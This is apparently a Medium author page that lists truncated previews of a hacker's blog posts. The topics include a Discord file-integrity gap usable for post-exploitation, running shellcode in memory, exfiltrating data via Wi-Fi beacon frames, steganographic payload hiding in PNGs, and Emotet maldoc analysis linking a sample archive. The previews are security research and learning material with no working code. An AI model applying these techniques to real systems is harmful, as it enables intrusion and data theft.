I found this bug a while ago . This bug requires initial access . Its great for post exploitation . Discord keeps a sqlite database called installer.db . The database has sha256 hashes of
every file that discord uses but it turns out that the integrity of some files are never checked allowing an attacker to modify some js files that discord uses . This attack needs certain amount of access .An attacker that has a shell or some sort of access will be able to modify the files . The attacker can modify the js files to download and…


Malwares will sometimes run shellcode directly in memory . The common method to do that is first use VirtualAlloc to allocate memory with the right permissions . Then the malware will use RtlMoveMemory to write the shellcode to the allocated space . Then it will create thread to pass the control to that location

A simple program to do that

To extract the shellcode we can use api hooks . Basically set a breakpoint at any of the API call . I will use x64dbg . You can use any other application if you want . Load the executable to x64dbg . Go to symbols …


I am writing this blog with hopes that i will probably get hired by some gentleman/woman . I have been trying to get a job in IT but cant seem to impress . I have done enough projects which gave me enough confidence that i can make anything . I like to make things that break things if that makes sense so my dream job would be researching and making exploits ,tools,security tools,malwares for red teams for use in pentests etc . But i am ok with any job that lets my inner researcher out . …


Beacon frame : Here is the wikipedia defination . Beacon frame is one of the management frames in IEEE 802.11 based WLANs. It contains all the information about the network. Beacon frames are transmitted periodically, they serve to announce the presence of a wireless LAN and to synchronise the members of the service set .

How this method works ?

This method uses scapy to generate beacon frames . The ssid field is used to send data . Suppose you have a file . The program will take first ten bytes from the file and it will transmit it in…


I have been analysing maldocs for few days . I analysed two variants of emotet but i will write about only one variant . This will be a static analysis . First download the samples from here:https://github.com/jstrosch/malware-samples/blob/master/maldocs/emotet/2020/January/samples.zip

I dumped the macros using oledump .

The streams with M/m contains the macro . I then dumped the streams using the command “oledump.py -s 16 -v file” . Next i checked the entry point


Since you are here , i am going to assume that you know basic about syscalls and how to call them as well as how to assemble and link the assembly files . You may have a question . Why assembly ? Well there are two reasons . My life was boring so it gave my brain something to work on . The second reason is that we get absolute control over the code and its really small . A simple C program has many other functions that gets executed even before main() . Although it does not effect our…


My friend who works as for a company . Lets call the company X . I cant post screenshots here as i was not allowed to take any . This incident happened 5–6 months ago so my memories are quite vague . He called me and asked how to handle the malware . The malware was exfiltrating data at very high speeds since the servers had high speed internet . I asked him to let me work on this as that thing was really exciting . He gave me the creds of proxmox admin panel after asking for permissions …


I recently came across a powershell malware that used steganography and living of the land techniques . It was cool so i decided to make a similar poc with python . Lets clear the basics first . I will use a png image . A png image contains three compulsory channels (RGB) and an Alpha channel for transparency . I wont touch the RGB channels . I will modify the alpha channel to hide the payload

  1. First lets find an image with Alpha channel . I will use an image that that blender rendered . Blender renders by default conatain…

Disclaimer : I am not an android developer and i hate java so i dont know much about the code . So if i make any mistake please correct me . Now lets get started

My friend received a message with a shortened link that points to a github website . This website keeps changing but here is the shortened URL .

If you are from India then you may know that some state govts provides laptops to highschool students . …


I wrote a python program that runs in background and keeps checking for new usb pendrives after intervals . This pendrive also has a private key thats the programs checks and verifies with its public key . If it matches you decrypt the files that you have . The files uses AES encryption . You cant decrypt the files without the proper pendrive . Here how it works .

  1. The program has a mode where you can run it with a argument “ — setup” . In this mode the program will generate private and public keys . It will…

Debabrata

I am a hacker and ex-web developer . I sometime work as a freelance dev/hacker . Sometime I hunt bugs

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store